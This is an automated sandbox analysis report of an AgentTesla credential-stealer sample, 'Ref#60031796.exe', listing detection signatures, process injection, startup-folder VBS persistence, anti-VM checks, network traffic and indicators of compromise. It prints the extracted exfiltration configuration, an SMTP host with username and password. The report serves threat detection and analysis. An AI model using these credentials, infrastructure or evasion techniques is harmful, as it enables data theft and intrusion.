Windows Analysis Report
Ref#60031796.exe

Overview

General Information

Sample name: Ref#60031796.exe
Analysis ID: 1567429
MD5: 654ad72d10aed979428b6b130700754a
SHA1: 68b0db31a9cab6fcc804dc6932d44d9081b14c14
SHA256: 2f9639175e04906207564913e4c0493b196f59dd4bc8f62deea0ececb4346891
Tags: exe, user-abuse_ch
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#60031796.exe (PID: 1012 cmdline: "C:\Users\user\Desktop\Ref#60031796.exe" MD5: 654AD72D10AED979428B6B130700754A)
    • InstallUtil.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 2404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 5504 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: 654AD72D10AED979428B6B130700754A)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Ref#60031796.exe.7080000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#60031796.exe.3bce418.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Ref#60031796.exe.3bce418.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.Ref#60031796.exe.3bce418.4.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Ref#60031796.exe.3bce418.4.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                      System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", ProcessId: 2404, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 5716, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49759
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs", ProcessId: 2404, ProcessName: wscript.exe

                      Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#60031796.exe, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T15:20:35.207129+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 49759 | 162.254.34.31 | 587 | TCP
2024-12-03T15:22:44.360977+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49973 | 5.253.86.15 | 443 | TCP

                      AV Detection

Source: 3.2.InstallUtil.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source: C:\Users\user\AppData\Roaming\vdvfyt.exe; ReversingLabs: Detection: 13%
Source: Ref#60031796.exe; ReversingLabs: Detection: 13%
Source: Submited Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\vdvfyt.exe; Joe Sandbox ML: detected
Source: Ref#60031796.exe; Joe Sandbox ML: detected
Source: Ref#60031796.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.6:49715, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49751, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49779, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49973, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49979, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49984, version: TLS 1.2
Source: Ref#60031796.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 0714BB07h (0_2_0714B758)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 0714BB07h (0_2_0714B768)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 071456B9h (0_2_07145658)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 071456B9h (0_2_0714564A)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 071452C1h (0_2_07144EB8)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 071452C1h (0_2_07144EC8)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 071456B9h (0_2_07145853)
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 4x nop then jmp 0714BB07h (0_2_0714B85C)

                      Networking

Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP: 192.168.2.6:49759 -> 162.254.34.31:587
Source: global traffic; TCP traffic: 192.168.2.6:49759 -> 162.254.34.31:587
Source: global traffic; HTTP traffic detected: GET /Dwhm HTTP/1.1 | Host: oshi.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Dwhm HTTP/1.1 | Host: oshi.at
Source: Joe Sandbox View; IP Address: 194.15.112.248
Source: Joe Sandbox View; IP Address: 104.26.13.205
Source: Joe Sandbox View; IP Address: 162.254.34.31
Source: Joe Sandbox View; ASN Name: VIVIDHOSTINGUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: api.ipify.org
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H: 192.168.2.6:49973 -> 5.253.86.15:443
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: oshi.at
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: unknown; Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown; Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown; Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49779

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, SKTzxzsJw.cs; .Net Code: nUAqbab

                      System Summary

Source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 0_2_0682DDE8 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 0_2_0682DDE2 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 0_2_0714F600 NtResumeThread
Source: C:\Users\user\Desktop\Ref#60031796.exe; Code function: 0_2_0714F5F8 NtResumeThread
                      Source: Ref#60031796.exe | Static PE information: invalid certificate
                      Source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000000.2115905144.0000000000866000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameref.exe8 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002BFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2361046731.0000000006E00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAxvkvum.dll" vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2345387570.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAxvkvum.dll" vs Ref#60031796.exe
                      Source: Ref#60031796.exe | Binary or memory string: OriginalFilenameref.exe8 vs Ref#60031796.exe
                      Source: Ref#60031796.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#60031796.exe, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@6/3@3/4
                      Source: C:\Users\user\Desktop\Ref#60031796.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Mutant created: NULL
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: Ref#60031796.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#60031796.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Ref#60031796.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Ref#60031796.exe | ReversingLabs: Detection: 13%
                      Source: C:\Users\user\Desktop\Ref#60031796.exe | File read: C:\Users\user\Desktop\Ref#60031796.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Ref#60031796.exe "C:\Users\user\Desktop\Ref#60031796.exe"
                      Source: C:\Users\user\Desktop\Ref#60031796.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                      Source: C:\Users\user\Desktop\Ref#60031796.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, ntmarta.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, vaultcli.dll, wintypes.dll
                      Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll
                      Source: C:\Users\user\Desktop\Ref#60031796.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#60031796.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#60031796.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: Yara match File source: 0.2.Ref#60031796.exe.7080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.Ref#60031796.exe.3d54598.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
